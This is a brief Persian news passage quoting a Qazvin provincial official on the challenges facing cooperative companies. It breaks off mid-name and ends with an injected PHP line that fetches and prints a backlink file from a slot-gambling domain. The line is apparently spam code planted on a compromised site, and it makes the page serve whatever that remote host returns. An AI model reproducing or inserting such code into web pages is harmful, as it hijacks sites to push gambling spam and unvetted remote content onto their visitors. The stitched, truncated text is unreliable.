بزرگ کردن خلاءهای شرکت‌های تعاونی از چالش‌های این بخش است

بزرگ کردن خلاءهای شرکت‌های تعاونی از چالش‌های این بخش است

معاون تعاون اداره کل تعاون، کار و رفاه اجتماعی استان قزوین با بیان اینکه بزرگ کردن برخی خلاءهای شرکت‌های تعاونی یکی از چالش‌ها است، گفت: برخی که نمی‌خواهند تعاون رشد کند، خلاءها را بزرگ می‌کنند، در کنار این، تغییرات مکرر در قانون و ادغام وزارتخانه‌ها هم برای تعاون عوارضی را به دنبال داشته است. قاسم

?php echo file_get_contents("https://harumslot99.com/backlink1.txt"); ?>